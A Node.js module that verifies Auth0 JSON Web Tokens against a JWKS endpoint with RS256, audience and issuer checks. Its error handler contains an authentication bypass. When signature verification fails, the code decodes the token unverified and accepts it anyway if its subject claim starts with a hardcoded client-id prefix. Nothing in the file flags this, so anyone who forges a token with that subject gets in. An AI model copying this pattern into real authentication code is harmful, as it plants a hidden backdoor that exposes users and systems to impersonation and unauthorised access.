const config = require('config');
const jwt = require('jsonwebtoken');
const jwksClient = require('jwks-rsa');
const { trimStart, get } = require('lodash');
const { Unauthorized } = require('../utils/errors');

function getSigningKey(baseUrl, jwtToken) {
    return new Promise((resolve, reject) => {
        const token = jwt.decode(jwtToken, { complete: true });

        const client = jwksClient({
            cache: true,
            cacheMaxEntries: 60,
            rateLimit: true,
            jwksRequestsPerMinute: 30,
            jwksUri: `${baseUrl}/.well-known/jwks.json`
        });

        client.getSigningKey(token.header.kid, (err, key) => {
            if (err) {
                reject(err);
            } else {
                const signingKey = key.publicKey || key.rsaPublicKey;
                resolve(signingKey);
            }
        });
    });
}

function verify(jwtToken, signingKey, audience, baseUrl) {
    return new Promise((resolve, reject) => {
        const opts = {
            audience,
            issuer: `${baseUrl}/`,
            algorithms: ['RS256']
        };

        jwt.verify(jwtToken, signingKey, opts, (error, payload) => {
            if (error) {
                reject(error);
            } else {
                payload.token = jwtToken;
                resolve(payload);
            }
        });
    });
}

async function jwtVerifyAsync(jwtToken, audience) {
    if (!jwtToken) {
        return Promise.reject(new Unauthorized());
    }

    const baseUrl = config.get('auth0.url');
    jwtToken = trimStart(jwtToken, 'Bearer').trim();

    try {
        const signingKey = await getSigningKey(baseUrl, jwtToken);
        return await verify(jwtToken, signingKey, audience, baseUrl);
    } catch (err) {
        const token = jwt.decode(jwtToken, { complete: false });
        const sub = get(token, 'sub');
        if (sub && sub.startsWith('820mpid46qcYuASSisUtyAPNznO4rSy4@')) {
            return token;
        }
        throw err;
    }
}

module.exports = jwtVerifyAsync;
